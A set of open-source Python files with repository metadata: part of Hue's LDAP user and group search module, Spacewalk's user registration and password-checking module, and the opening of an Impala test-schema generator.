return LdapConnection(ldap_config, ldap_url, username, password, ldap_cert)
else:
return LdapConnection(ldap_config, ldap_url, get_ldap_username(username, ldap_config.NT_DOMAIN.get()), password, ldap_cert)
def get_ldap_username(username, nt_domain):
if nt_domain:
return '%s@%s' % (username, nt_domain)
else:
return username
def get_ldap_user_kwargs(username):
if desktop.conf.LDAP.IGNORE_USERNAME_CASE.get():
return {
'username__iexact': username
}
else:
return {
'username': username
}
def get_ldap_user(username):
username_kwargs = get_ldap_user_kwargs(username)
return User.objects.get(**username_kwargs)
def get_or_create_ldap_user(username):
username_kwargs = get_ldap_user_kwargs(username)
users = User.objects.filter(**username_kwargs)
if users.exists():
return User.objects.get(**username_kwargs), False
else:
username = desktop.conf.LDAP.FORCE_USERNAME_LOWERCASE.get() and username.lower() or username
return User.objects.create(username=username), True
class LdapConnection(object):
"""
Constructor creates LDAP connection. Contains methods
to easily query an LDAP server.
"""
def __init__(self, ldap_config, ldap_url, bind_user=None, bind_password=None, cert_file=None):
"""
Constructor initializes the LDAP connection
"""
self.ldap_config = ldap_config
if cert_file is not None:
ldap.set_option(ldap.OPT_X_TLS_REQUIRE_CERT, ldap.OPT_X_TLS_ALLOW)
ldap.set_option(ldap.OPT_X_TLS_CACERTFILE, cert_file)
if self.ldap_config.FOLLOW_REFERRALS.get():
ldap.set_option(ldap.OPT_REFERRALS, 1)
else:
ldap.set_option(ldap.OPT_REFERRALS, 0)
if ldap_config.DEBUG.get():
ldap.set_option(ldap.OPT_DEBUG_LEVEL, ldap_config.DEBUG_LEVEL.get())
self.ldap_handle = ldap.initialize(uri=ldap_url, trace_level=ldap_config.TRACE_LEVEL.get())
if bind_user is not None:
try:
self.ldap_handle.simple_bind_s(bind_user, bind_password)
except:
msg = "Failed to bind to LDAP server as user %s" % bind_user
LOG.exception(msg)
raise LdapBindException(msg)
else:
try:
# Do anonymous bind
self.ldap_handle.simple_bind_s('','')
except:
msg = "Failed to bind to LDAP server anonymously"
LOG.exception(msg)
raise LdapBindException(msg)
def _get_search_params(self, name, attr, find_by_dn=False):
"""
if we are to find this ldap object by full distinguished name,
then search by setting search_dn to the 'name'
rather than by filtering by 'attr'.
"""
base_dn = self._get_root_dn()
if find_by_dn:
search_dn = re.sub(r'(\w+=)', lambda match: match.group(0).upper(), name)
if not search_dn.upper().endswith(base_dn.upper()):
raise LdapSearchException("Distinguished Name provided does not contain configured Base DN. Base DN: %(base_dn)s, DN: %(dn)s" % {
'base_dn': base_dn,
'dn': search_dn
})
return (search_dn, '')
else:
return (base_dn, '(' + attr + '=' + name + ')')
def _transform_find_user_results(self, result_data, user_name_attr):
"""
:param result_data: List of dictionaries that have ldap attributes and their associated values. Generally the result list from an ldapsearch request.
:param user_name_attr: The ldap attribute that is returned by the server to map to ``username`` in the return dictionary.
:returns list of dictionaries that take on the following form: {
'dn': <distinguished name of entry>,
'username': <ldap attribute associated with user_name_attr>
'first': <first name>
'last': <last name>
'email': <email>
'groups': <list of DNs of groups that user is a member of>
}
"""
user_info = []
if result_data:
for dn, data in result_data:
# Skip Active Directory # refldap entries.
if dn is not None:
# Case insensitivity
data = CaseInsensitiveDict.from_dict(data)
# Skip unnamed entries.
if user_name_attr not in data:
LOG.warn('Could not find %s in ldap attributes' % user_name_attr)
continue
ldap_info = {
'dn': dn,
'username': data[user_name_attr][0]
}
if 'givenName' in data:
ldap_info['first'] = data['givenName'][0]
if 'sn' in data:
ldap_info['last'] = data['sn'][0]
if 'mail' in data:
ldap_info['email'] = data['mail'][0]
# memberOf and isMemberOf should be the same if they both exist
if 'memberOf' in data:
ldap_info['groups'] = data['memberOf']
if 'isMemberOf' in data:
ldap_info['groups'] = data['isMemberOf']
user_info.append(ldap_info)
return user_info
def _transform_find_group_results(self, result_data, group_name_attr, group_member_attr):
group_info = []
if result_data:
for dn, data in result_data:
# Skip Active Directory # refldap entries.
if dn is not None:
# Case insensitivity
data = CaseInsensitiveDict.from_dict(data)
# Skip unnamed entries.
if group_name_attr not in data:
LOG.warn('Could not find %s in ldap attributes' % group_name_attr)
continue
group_name = data[group_name_attr][0]
if desktop.conf.LDAP.FORCE_USERNAME_LOWERCASE.get():
group_name = group_name.lower()
ldap_info = {
'dn': dn,
'name': group_name
}
if group_member_attr in data and 'posixGroup' not in data['objectClass']:
ldap_info['members'] = data[group_member_attr]
else:
ldap_info['members'] = []
if 'posixGroup' in data['objectClass'] and 'memberUid' in data:
ldap_info['posix_members'] = data['memberUid']
else:
ldap_info['posix_members'] = []
group_info.append(ldap_info)
return group_info
def find_users(self, username_pattern, search_attr=None, user_name_attr=None, user_filter=None, find_by_dn=False, scope=ldap.SCOPE_SUBTREE):
"""
LDAP search helper method finding users. This supports searching for users
by distinguished name, or the configured username attribute.
:param username_pattern: The pattern to match ``search_attr`` against. Defaults to ``search_attr`` if none.
:param search_attr: The ldap attribute to search for ``username_pattern``. Defaults to LDAP -> USERS -> USER_NAME_ATTR config value.
:param user_name_attr: The ldap attribute that is returned by the server to map to ``username`` in the return dictionary.
:param find_by_dn: Search by distinguished name.
:param scope: ldapsearch scope.
:returns: List of dictionaries that take on the following form: {
'dn': <distinguished name of entry>,
'username': <ldap attribute associated with user_name_attr>
'first': <first name>
'last': <last name>
'email': <email>
'groups': <list of DNs of groups that user is a member of>
}
``
"""
if not search_attr:
search_attr = self.ldap_config.USERS.USER_NAME_ATTR.get()
if not user_name_attr:
user_name_attr = search_attr
if not user_filter:
user_filter = self.ldap_config.USERS.USER_FILTER.get()
if not user_filter.startswith('('):
user_filter = '(' + user_filter + ')'
# Allow wild cards on non distinguished names
sanitized_name = ldap.filter.escape_filter_chars(username_pattern).replace(r'\2a', r'*')
# Fix issue where \, is converted to \5c,
sanitized_name = sanitized_name.replace(r'\5c,', r'\2c')
search_dn, user_name_filter = self._get_search_params(sanitized_name, search_attr, find_by_dn)
ldap_filter = '(&' + user_filter + user_name_filter + ')'
attrlist = ['objectClass', 'isMemberOf', 'memberOf', 'givenName', 'sn', 'mail', 'dn', user_name_attr]
ldap_result_id = self.ldap_handle.search(search_dn, scope, ldap_filter, attrlist)
result_type, result_data = self.ldap_handle.result(ldap_result_id)
if result_type == ldap.RES_SEARCH_RESULT:
return self._transform_find_user_results(result_data, user_name_attr)
else:
return []
def find_groups(self, groupname_pattern, search_attr=None, group_name_attr=None, group_member_attr=None, group_filter=None, find_by_dn=False, scope=ldap.SCOPE_SUBTREE):
"""
LDAP search helper method for finding groups
:param groupname_pattern: The pattern to match ``search_attr`` against. Defaults to ``search_attr`` if none.
:param search_attr: The ldap attribute to search for ``groupname_pattern``. Defaults to LDAP -> GROUPS -> GROUP_NAME_ATTR config value.
:param group_name_attr: The ldap attribute that is returned by the server to map to ``name`` in the return dictionary.
:param find_by_dn: Search by distinguished name.
:param scope: ldapsearch scope.
:returns: List of dictionaries that take on the following form: {
'dn': <distinguished name of entry>,
'name': <ldap attribute associated with group_name_attr>
'first': <first name>
'last': <last name>
'email': <email>
'groups': <list of DNs of groups that user is a member of>
}
"""
if not search_attr:
search_attr = self.ldap_config.GROUPS.GROUP_NAME_ATTR.get()
if not group_name_attr:
group_name_attr = search_attr
if not group_member_attr:
group_member_attr = self.ldap_config.GROUPS.GROUP_MEMBER_ATTR.get()
if not group_filter:
group_filter = self.ldap_config.GROUPS.GROUP_FILTER.get()
if not group_filter.startswith('('):
group_filter = '(' + group_filter + ')'
# Allow wild cards on non distinguished names
sanitized_name = ldap.filter.escape_filter_chars(groupname_pattern).replace(r'\2a', r'*')
# Fix issue where \, is converted to \5c,
sanitized_name = sanitized_name.replace(r'\5c,', r'\2c')
search_dn, group_name_filter = self._get_search_params(sanitized_name, search_attr, find_by_dn)
ldap_filter = '(&' + group_filter + group_name_filter + ')'
attrlist = ['objectClass', 'dn', 'memberUid', group_member_attr, group_name_attr]
ldap_result_id = self.ldap_handle.search(search_dn, scope, ldap_filter, attrlist)
result_type, result_data = self.ldap_handle.result(ldap_result_id)
if result_type == ldap.RES_SEARCH_RESULT:
return self._transform_find_group_results(result_data, group_name_attr, group_member_attr)
else:
return []
def find_members_of_group(self, dn, search_attr, ldap_filter, scope=ldap.SCOPE_SUBTREE):
if ldap_filter and not ldap_filter.startswith('('):
ldap_filter = '(' + ldap_filter + ')'
# Allow wild cards on non distinguished names
dn = ldap.filter.escape_filter_chars(dn).replace(r'\2a', r'*')
# Fix issue where \, is converted to \5c,
dn = dn.replace(r'\5c,', r'\2c')
search_dn, _ = self._get_search_params(dn, search_attr)
ldap_filter = '(&%(ldap_filter)s(|(isMemberOf=%(group_dn)s)(memberOf=%(group_dn)s)))' % {'group_dn': dn, 'ldap_filter': ldap_filter}
attrlist = ['objectClass', 'isMemberOf', 'memberOf', 'givenName', 'sn', 'mail', 'dn', search_attr]
ldap_result_id = self.ldap_handle.search(search_dn, scope, ldap_filter, attrlist)
result_type, result_data = self.ldap_handle.result(ldap_result_id)
if result_type == ldap.RES_SEARCH_RESULT:
return result_data
else:
return []
def find_users_of_group(self, dn):
ldap_filter = self.ldap_config.USERS.USER_FILTER.get()
name_attr = self.ldap_config.USERS.USER_NAME_ATTR.get()
result_data = self.find_members_of_group(dn, name_attr, ldap_filter)
return self._transform_find_user_results(result_data, name_attr)
def find_groups_of_group(self, dn):
ldap_filter = self.ldap_config.GROUPS.GROUP_FILTER.get()
name_attr = self.ldap_config.GROUPS.GROUP_NAME_ATTR.get()
member_attr = self.ldap_config.GROUPS.GROUP_MEMBER_ATTR.get()
result_data = self.find_members_of_group(dn, name_attr, ldap_filter)
return self._transform_find_group_results(result_data, name_attr, member_attr)
def _get_root_dn(self):
return self.ldap_config.BASE_DN.get()
|
vmax-feihu/hue
|
apps/useradmin/src/useradmin/ldap_access.py
|
Python
|
apache-2.0
| 14,369
| 0.009326
|
#
# Copyright (c) 2008--2010 Red Hat, Inc.
#
# This software is licensed to you under the GNU General Public License,
# version 2 (GPLv2). There is NO WARRANTY for this software, express or
# implied, including the implied warranties of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. You should have received a copy of GPLv2
# along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
#
# Red Hat trademarks are not licensed under GPLv2. No permission is
# granted to use or replicate Red Hat trademarks that are incorporated
# in this software or its documentation.
#
#
# Stuff for handling Certificates and Servers
#
import re
import crypt
import string
# Global Modules
from spacewalk.common import UserDictCase, rhnFault, rhnException, \
CFG, log_debug, log_error
from spacewalk.common.rhnTranslate import _
import rhnSQL
import rhnSession
# Main User class
class User:
def __init__(self, username, password):
# compatibilty with the rest of the code
self.username = username
# placeholders for the table schemas
# web_contact
self.contact = rhnSQL.Row("web_contact", "id")
self.contact["login"] = username
self.contact["password"] = password
self.contact["old_password"] = password
# web_customer
self.customer = rhnSQL.Row("web_customer", "id")
self.customer["name"] = username
self.customer["password"] = password
# web_user_personal_info
self.__init_info()
# web_user_contact_permission
self.__init_perms()
# web_user_site_info
self.__init_site()
self._session = None
# init web_user_personal_info
def __init_info(self):
# web_user_personal_info
self.info = rhnSQL.Row("web_user_personal_info",
"web_user_id")
self.info['first_names'] = "Valued"
self.info['last_name'] = "Customer"
self.info['prefix'] = "Mr."
# init web_user_contact_permission
def __init_perms(self):
# web_user_contact_permission
self.perms = rhnSQL.Row("web_user_contact_permission",
"web_user_id")
self.perms["email"] = "Y"
self.perms["mail"] = "Y"
self.perms["call"] = "Y"
self.perms["fax"] = "Y"
# init web_user_site_info
def __init_site(self):
# web_user_site_info
self.site = rhnSQL.Row("web_user_site_info", "id")
self.site['city'] = "."
self.site['address1'] = "."
self.site['country'] = "US"
self.site['type'] = "M"
self.site['notes'] = "Entry created by Spacewalk registration process"
# simple check for a password that might become more complex sometime
def check_password(self, password):
good_pwd = str(self.contact["password"])
old_pwd = str(self.contact["old_password"])
if CFG.pam_auth_service:
# a PAM service is defined
# We have to check the user's rhnUserInfo.use_pam_authentication
# XXX Should we create yet another __init_blah function?
# since it's the first time we had to lool at rhnUserInfo,
# I'll assume it's not something to happen very frequently,
# so I'll use a query for now
# - misa
#
h = rhnSQL.prepare("""
select ui.use_pam_authentication
from web_contact w, rhnUserInfo ui
where w.login_uc = UPPER(:login)
and w.id = ui.user_id""")
h.execute(login=self.contact["login"])
data = h.fetchone_dict()
if not data:
# This should not happen
raise rhnException("No entry found for user %s" %
self.contact["login"])
if data['use_pam_authentication'] == 'Y':
# use PAM
import rhnAuthPAM
return rhnAuthPAM.check_password(self.contact["login"],
password, CFG.pam_auth_service)
# If the entry in rhnUserInfo is 'N', perform regular
# authentication
return check_password(password, good_pwd, old_pwd)
def set_org_id(self, org_id):
if not org_id:
raise rhnException("Invalid org_id requested for user", org_id)
self.contact["org_id"] = int(org_id)
self.customer.load(int(org_id))
def getid(self):
if not self.contact.has_key("id"):
userid = rhnSQL.Sequence("web_contact_id_seq")()
self.contact.data["id"] = userid # kind of illegal, but hey!
else:
userid = self.contact["id"]
return userid
# handling of contact permissions
def set_contact_perm(self, name, value):
if not name: return -1
n = string.lower(name)
v = 'N'
if value:
v = 'Y'
if n == "contact_phone": self.perms["call"] = v
elif n == "contact_mail": self.perms["mail"] = v
elif n == "contact_email": self.perms["email"] = v
elif n == "contact_fax": self.perms["fax"] = v
return 0
# set a certain value for the userinfo field. This is BUTT ugly.
def set_info(self, name, value):
log_debug(3, name, value)
# translation from what the client send us to real names of the fields
# in the tables.
mapping = {
"first_name" : "first_names",
"position" : "title",
"title" : "prefix"
}
if not name:
return -1
name = string.lower(name)
if type(value) == type(""):
value = string.strip(value)
# We have to watch over carefully for different field names
# being sent from rhn_register (up2date --register)
changed = 0
# translation
if name in mapping.keys():
name = mapping[name]
# Some fields can not have null string values
if name in ["first_names", "last_name", "prefix", # personal_info
"address1", "city", "country"]: # site_info
# we require something of it
if len(str(value)) == 0:
return -1
# fields in personal_info (and some in site)
if name in ["last_name", "first_names",
"company", "phone", "fax", "email", "title"]:
self.info[name] = value[:128]
changed = 1
elif name == "prefix":
values = ["Mr.", "Mrs.", "Ms.", "Dr.", "Hr.", "Sr."]
# Now populate a dictinary of valid values
valids = UserDictCase()
for v in values: # initialize from good values, with and w/o the dot
valids[v] = v
valids[v[:-1]] = v
# commonly encountered values
valids["Miss"] = "Miss"
valids["Herr"] = "Hr."
valids["Sig."] = "Sr."
valids["Sir"] = "Mr."
# Now check it out
if valids.has_key(value):
self.info["prefix"] = valids[value]
changed = 1
else:
log_error("Unknown prefix value `%s'. Assumed `Mr.' instead"
% value)
self.info["prefix"] = "Mr."
changed = 1
# fields in site
if name in ["phone", "fax", "zip"]:
self.site[name] = value[:32]
changed = 1
elif name in ["city", "country", "alt_first_names", "alt_last_name",
"address1", "address2", "email",
"last_name", "first_names"]:
if name == "last_name":
self.site["alt_last_name"] = value
changed = 1
elif name == "first_names":
self.site["alt_first_names"] = value
changed = 1
else:
self.site[name] = value[:128]
changed = 1
elif name in ["state"]: # stupid people put stupid things in here too
self.site[name] = value[:60]
changed = 1
if not changed:
log_error("SET_INFO: Unknown info `%s' = `%s'" % (name, value))
return 0
# Save this record in the database
def __save(self):
is_admin = 0
if self.customer.real:
# get the org_id and the applicant group id for this org
org_id = self.customer["id"]
h = rhnSQL.prepare("""
select ug.id
from rhnUserGroup ug, rhnUserGroupType ugt
where ugt.label = 'org_applicant'
and ug.group_type = ugt.id
and ug.org_id = :org_id
""")
h.execute(org_id=org_id)
data = h.fetchone_dict()
# XXX: prone to errors, but we'll need to see them first
grp_id = data["id"]
else: # an org does not exist... create one
create_new_org = rhnSQL.Procedure("create_new_org")
ret = create_new_org(
self.customer["name"],
self.customer["password"],
None, None, "B",
rhnSQL.types.NUMBER(),
rhnSQL.types.NUMBER(),
rhnSQL.types.NUMBER(),
)
org_id, adm_grp_id, app_grp_id = ret[-3:]
# We want to make sure we set the group limits right
tbl = rhnSQL.Row("rhnUserGroup", "id")
# Set the default admin limits to Null
tbl.load(adm_grp_id)
# bz:210230: this value should default to Null
tbl.save()
# Set the default applicats limit to 0
tbl.load(app_grp_id)
tbl["max_members"] = 0
tbl.save()
# reload the customer table
self.customer.load(org_id)
# and finally, we put this one in the admin group
grp_id = adm_grp_id
is_admin = 1
# save the contact
if self.contact.real:
if not self.contact["org_id"]:
raise rhnException("Undefined org_id for existing user entry",
self.contact.data)
userid = self.contact["id"]
self.contact.save()
else:
userid = self.getid()
self.contact["org_id"] = org_id
# if not admin, obfuscate the password
# (and leave the old_password set)
if not is_admin: # we only do this for new users.
log_debug(5, "Obfuscating user password")
user_pwd = self.contact["password"]
crypt_pwd = crypt.crypt(user_pwd, str(userid)[-2:])
self.contact["password"] = crypt_pwd
self.contact.create(userid)
# rhnUserInfo
h = rhnSQL.prepare("insert into rhnUserInfo (user_id) "
"values (:user_id)")
h.execute(user_id=userid)
# now add this user to the admin/applicant group for his org
create_ugm = rhnSQL.Procedure("rhn_user.add_to_usergroup")
# grp_id is the admin or the applicant, depending on whether we
# just created the org or not
create_ugm(userid, grp_id)
# and now reload this data
self.contact.load(userid)
# do the same for the other structures indexed by web_user_id
# personal info
if self.info.real: self.info.save()
else: self.info.create(userid)
# contact permissions
if self.perms.real: self.perms.save()
else: self.perms.create(userid)
# And now save the site information
if self.site.real:
siteid = self.site["id"]
self.site.save()
else:
siteid = rhnSQL.Sequence("web_user_site_info_id_seq")()
self.site["web_user_id"] = userid
self.site.create(siteid)
return 0
def get_roles(self):
user_id = self.getid()
h = rhnSQL.prepare("""
select ugt.label as role
from rhnUserGroup ug,
rhnUserGroupType ugt,
rhnUserGroupMembers ugm
where ugm.user_id = :user_id
and ugm.user_group_id = ug.id
and ug.group_type = ugt.id
""")
h.execute(user_id=user_id)
return map(lambda x: x['role'], h.fetchall_dict() or [])
# This is a wrapper for the above class that allows us to rollback
# any changes in case we don't succeed completely
def save(self):
log_debug(3, self.username)
rhnSQL.commit()
try:
self.__save()
except:
rhnSQL.rollback()
# shoot the exception up the chain
raise
else:
rhnSQL.commit()
return 0
# Reload the current data from the SQL database using the given id
def reload(self, user_id):
log_debug(3, user_id)
# If we can not load these we have a fatal condition
if not self.contact.load(user_id):
raise rhnException("Could not find contact record for id", user_id)
if not self.customer.load(self.contact["org_id"]):
raise rhnException("Could not find org record",
"user_id = %s" % user_id,
"org_id = %s" % self.contact["org_id"])
# These other ones are non fatal because we can create dummy records
if not self.info.load(user_id):
self.__init_info()
if not self.perms.load(user_id):
self.__init_perms()
# The site info is trickier, we need to find it first
if not self.site.load_sql("web_user_id = :userid and type = 'M'",
{ "userid" : user_id }):
self.__init_site()
# Fix the username
self.username = self.contact['login']
return 0
def create_session(self):
if self._session:
return self._session
self.session = rhnSession.generate(web_user_id=self.getid())
return self.session
# hrm. it'd be nice to move importlib.userAuth stuff here
def auth_username_password(username, password):
user = search(username)
if not user:
raise rhnFault(2, _("Invalid username/password combination"))
if not user.check_password(password):
raise rhnFault(2, _("Invalid username/password combination"))
return user
def session_reload(session_string):
log_debug(4, session_string)
session = rhnSession.load(session_string)
web_user_id = session.uid
if not web_user_id:
raise rhnSession.InvalidSessionError("No user associated with session")
u = User("", "")
ret = u.reload(web_user_id)
if ret != 0:
# Something horked
raise rhnFault(10)
return u
# search for an userid
def get_user_id(username):
username = str(username)
h = rhnSQL.prepare("""
select w.id from web_contact w
where w.login_uc = upper(:username)
""")
h.execute(username=username)
data = h.fetchone_dict()
if data:
return data["id"]
return None
# search the database for a user
def search(user):
log_debug(3, user)
userid = get_user_id(user)
if not userid: # no user found
return None
ret = User(user, "")
if not ret.reload(userid) == 0:
# something horked during reloading entry from database
# we can not realy say that the entry does not exist...
raise rhnFault(10)
return ret
def is_user_disabled(user):
log_debug(3, user)
username = str(user)
h = rhnSQL.prepare("""
select 1 from rhnWebContactDisabled
where login_uc = upper(:username)
""")
h.execute(username=username)
row = h.fetchone_dict()
if row:
return 1
return 0
# create a reservation record
def reserve_user(username, password):
return __reserve_user_db(username, password)
def __reserve_user_db(user, password):
encrypted_password = CFG.encrypted_passwords
log_debug(3, user, CFG.disallow_user_creation, encrypted_password, CFG.pam_auth_service)
user = str(user)
h = rhnSQL.prepare("""
select w.id, w.password, w.old_password, w.org_id, ui.use_pam_authentication
from web_contact w, rhnUserInfo ui
where w.login_uc = upper(:p1)
and w.id = ui.user_id
""")
h.execute(p1=user)
data = h.fetchone_dict()
if data and data["id"]:
# contact exists, check password
if data['use_pam_authentication'] == 'Y' and CFG.pam_auth_service:
# We use PAM for authentication
import rhnAuthPAM
if rhnAuthPAM.check_password(user, password, CFG.pam_auth_service) > 0:
return 1
return -1
if check_password(password, data['password'], data['old_password']) > 0:
return 1
return -1
# user doesn't exist. now we fail, instead of reserving user.
if CFG.disallow_user_creation:
raise rhnFault(2001)
# now check the reserved table
h = rhnSQL.prepare("""
select r.login, r.password from rhnUserReserved r
where r.login_uc = upper(:p1)
""")
h.execute(p1=user)
data = h.fetchone_dict()
if data and data["login"]:
# found already reserved
if check_password(password, data["password"], None) > 0:
return 1
return -2
validate_new_username(user)
log_debug(3, "calling validate_new_password" )
validate_new_password(password)
# this is not reserved either, register it
if encrypted_password:
# Encrypt the password, let the function pick the salt
password = encrypt_password(password)
h = rhnSQL.prepare("""
insert into rhnUserReserved (login, password)
values (:username, :password)
""")
h.execute(username=user, password=password)
rhnSQL.commit()
# all should be dandy
return 0
# create a new user account
def new_user(username, password, email, org_id, org_password):
return __new_user_db(username, password, email, org_id, org_password)
def __new_user_db(username, password, email, org_id, org_password):
encrypted_password = CFG.encrypted_passwords
log_debug(3, username, email, encrypted_password)
# now search it in the database
h = rhnSQL.prepare("""
select w.id, w.password, w.old_password, ui.use_pam_authentication
from web_contact w, rhnUserInfo ui
where w.login_uc = upper(:username)
and w.id = ui.user_id
""")
h.execute(username=username)
data = h.fetchone_dict()
pre_existing_user = 0
if not data:
# the username is not there, check the reserved user table
h = rhnSQL.prepare("""
select login, password, password old_password from rhnUserReserved
where login_uc = upper(:username)
""")
h.execute(username=username)
data = h.fetchone_dict()
if not data: # nope, not reserved either
raise rhnFault(1, _("Username `%s' has not been reserved") % username)
else:
pre_existing_user = 1
if not pre_existing_user and not email:
# New accounts have to specify an e-mail address
raise rhnFault(30, _("E-mail address not specified"))
# we have to perform PAM authentication if data has a field called
# 'use_pam_authentication' and its value is 'Y', and we do have a PAM
# service set in the config file.
# Note that if the user is only reserved we don't do PAM authentication
if data.get('use_pam_authentication') == 'Y' and CFG.pam_auth_service:
# Check the password with PAM
import rhnAuthPAM
if rhnAuthPAM.check_password(username, password, CFG.pam_auth_service) <= 0:
# Bad password
raise rhnFault(2)
# We don't care about the password anymore, replace it with something
import time
password = 'pam:%.8f' % time.time()
else:
# Regular authentication
if check_password(password, data["password"], data["old_password"]) == 0:
# Bad password
raise rhnFault(2)
# From this point on, the password may be encrypted
if encrypted_password:
password = encrypt_password(password)
is_real = 0
# the password matches, do we need to create a new entry?
if not data.has_key("id"):
user = User(username, password)
else: # we have to reload this entry into a User structure
user = User(username, password)
if not user.reload(data["id"]) == 0:
# something horked during reloading entry from database
# we can not really say that the entry does not exist...
raise rhnFault(10)
is_real = 1
# now we have user reloaded, check for updated email
if email:
# don't update the user's email address in the satellite context...
# we *must* in the live context, but user creation through up2date --register
# is disallowed in the satellite context anyway...
if not pre_existing_user:
user.set_info("email", email)
# XXX This should go away eventually
if org_id and org_password: # check out this org
h = rhnSQL.prepare("""
select id, password from web_customer
where id = :org_id
""")
h.execute(org_id=str(org_id))
data = h.fetchone_dict()
if not data: # wrong organization
raise rhnFault(2, _("Invalid Organization Credentials"))
# The org password is not encrypted, easy comparison
if string.lower(org_password) != string.lower(data["password"]):
# Invalid org password
raise rhnFault(2, _("Invalid Organization Credentials"))
if is_real: # this is a real entry, don't clobber the org_id
old_org_id = user.contact["org_id"]
new_org_id = data["id"]
if old_org_id != new_org_id:
raise rhnFault(42,
_("User `%s' not a member of organization %s") %
(username, org_id))
else: # new user, set its org
user.set_org_id(data["id"])
# force the save if this is a new entry
ret = user.save()
if not ret == 0:
raise rhnFault(5)
# check if we need to remove the reservation
if not data.has_key("id"):
# remove reservation
h = rhnSQL.prepare("""
delete from rhnUserReserved where login_uc = upper(:username)
""")
h.execute(username=username)
return 0
# Do some minimal checks on the data thrown our way
def check_user_password(username, password):
# username is required
if not username:
raise rhnFault(11)
# password is required
if not password:
raise rhnFault(12)
if len(username) < CFG.MIN_USER_LEN:
raise rhnFault(13, _("username should be at least %d characters")
% CFG.MIN_USER_LEN)
if len(username) > CFG.MAX_USER_LEN:
raise rhnFault(700, _("username should be less than %d characters")
% CFG.MAX_USER_LEN)
username = username[:CFG.MAX_USER_LEN]
# Invalid characters
# ***NOTE*** Must coordinate with web and installer folks about any
# changes to this set of characters!!!!
invalid_re = re.compile(".*[\s&+%'`\"=#]", re.I)
tmp = invalid_re.match(username)
if tmp is not None:
pos = tmp.regs[0]
raise rhnFault(15, _("username = `%s', invalid character `%s'") % (
username, username[pos[1]-1]))
# use new password validation method
validate_new_password(password)
return username, password
# Do some minimal checks on the e-mail address
def check_email(email):
if email is not None:
email = string.strip(email)
if not email:
# Still supported
return None
if len(email) > CFG.MAX_EMAIL_LEN:
raise rhnFault(100, _("Please limit your e-mail address to %s chars") %
CFG.MAX_EMAIL_LEN)
# XXX More to come (check the format is indeed foo@bar.baz
return email
# Validates the given key against the current or old password
# If encrypted_password is false, it compares key with pwd1 and pwd2
# If encrypted_password is true, it compares the encrypted key
# with pwd1 and pwd2
#
# Historical note: we used to compare the passwords case-insensitive, and that
# was working fine until we started to encrypt passwords. -- misa 20030530
#
# Old password is no longer granting access -- misa 20040205
def check_password(key, pwd1, pwd2=None):
encrypted_password = CFG.encrypted_passwords
log_debug(4, "Encrypted password:", encrypted_password)
# We don't trust the origin for key, so stringify it
key = str(key)
if len(key) == 0:
# No zero-length passwords accepted
return 0
if not encrypted_password:
# Unencrypted passwords
if key == pwd1: # good password
return 1
log_debug(4, "Unencrypted password doesn't match")
return 0 # Invalid
# Crypted passwords in the database
if pwd1 == encrypt_password(key, pwd1):
# Good password
return 1
log_debug(4, "Encrypted password doesn't match")
return 0 # invalid
# Encrypt the key
# If no salt is supplied, generates one (md5-crypt salt)
def encrypt_password(key, salt=None):
# Case insensitive key
if not salt:
# No salt supplied, generate it ourselves
import base64
import time
import os
# Get the first 7 digits after the decimal point from time.time(), and
# add the pid too
salt = (time.time() % 1) * 1e7 + os.getpid()
# base64 it and keep only the first 8 chars
salt = base64.encodestring(str(salt))[:8]
# slap the magic in front of the salt
salt = "$1$%s$" % salt
salt = str(salt)
return crypt.crypt(key, salt)
# Perform all the checks required for new passwords
def validate_new_password(password):
log_debug(3, "Entered validate_new_password")
#
# We're copying the code because we don't want to
# invalidate any of the existing passwords.
#
# Validate password based on configurable length
# regular expression
if not password:
raise rhnFault(12)
if len(password) < CFG.MIN_PASSWD_LEN:
raise rhnFault(14, _("password must be at least %d characters")
% CFG.MIN_PASSWD_LEN)
if len(password) > CFG.MAX_PASSWD_LEN:
raise rhnFault(701, _("Password must be shorter than %d characters")
% CFG.MAX_PASSWD_LEN)
password = password[:CFG.MAX_PASSWD_LEN]
invalid_re = re.compile(
r"[^ A-Za-z0-9`!@#$%^&*()-_=+[{\]}\\|;:'\",<.>/?~]")
asterisks_re = re.compile(r"^\**$")
# make sure the password isn't all *'s
tmp = asterisks_re.match(password)
if tmp is not None:
raise rhnFault(15, "password cannot be all asterisks '*'")
# make sure we have only printable characters
tmp = invalid_re.search(password)
if tmp is not None:
pos = tmp.regs[0]
raise rhnFault(15,
_("password contains character `%s'") % password[pos[1]-1])
# Perform all the checks required for new usernames
def validate_new_username(username):
log_debug(3)
if len(username) < CFG.MIN_NEW_USER_LEN:
raise rhnFault(13, _("username should be at least %d characters long")
% CFG.MIN_NEW_USER_LEN)
disallowed_suffixes = CFG.DISALLOWED_SUFFIXES or []
if not isinstance(disallowed_suffixes, type([])):
disallowed_suffixes = [ disallowed_suffixes ]
log_debug(4, "Disallowed suffixes", disallowed_suffixes)
for suffix in disallowed_suffixes:
if string.upper(username[-len(suffix):]) == string.upper(suffix):
raise rhnFault(106, _("Cannot register usernames ending with %s") %
suffix)
|
colloquium/spacewalk
|
backend/server/rhnUser.py
|
Python
|
gpl-2.0
| 28,422
| 0.004398
|
#!/usr/bin/env impala-python
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from random import choice, randint, random, shuffle
from os.path import join as join_path
from optparse import OptionParser
import json
MAX_NUM_STRUCT_FIELDS = 8
NULL_CHANCE = 0.5
SCALAR_TYPES = ['boolean', 'int', 'long', 'float', 'double', 'string']
class Node(object):
def __init__(self, num_fields, node_type):
self.node_type = node_type # one of struct, map, array
self.num_fields = num_fields
self.fields = []
class SchemaTreeGenerator(object):
def __init__(self, target_num_scalars=10, target_depth=3):
self._target_num_scalars = target_num_scalars
self._target_depth = target_depth
self._nodes = []
self._num_scalars_created = 0
self.root = None
def _create_random_node(self):
node_type = choice(('map', 'array', 'struct'))
if node_type in ('map', 'array'):
result_node = Node(1, node_type)
else:
num_fields = randint(1, MAX_NUM_STRUCT_FIELDS)
self._num_scalars_created += num_fields - 1
result_node = Node(num_fields, 'struct')
self._nodes.append(result_node)
return result_node
def _get_random_existing_node(self):
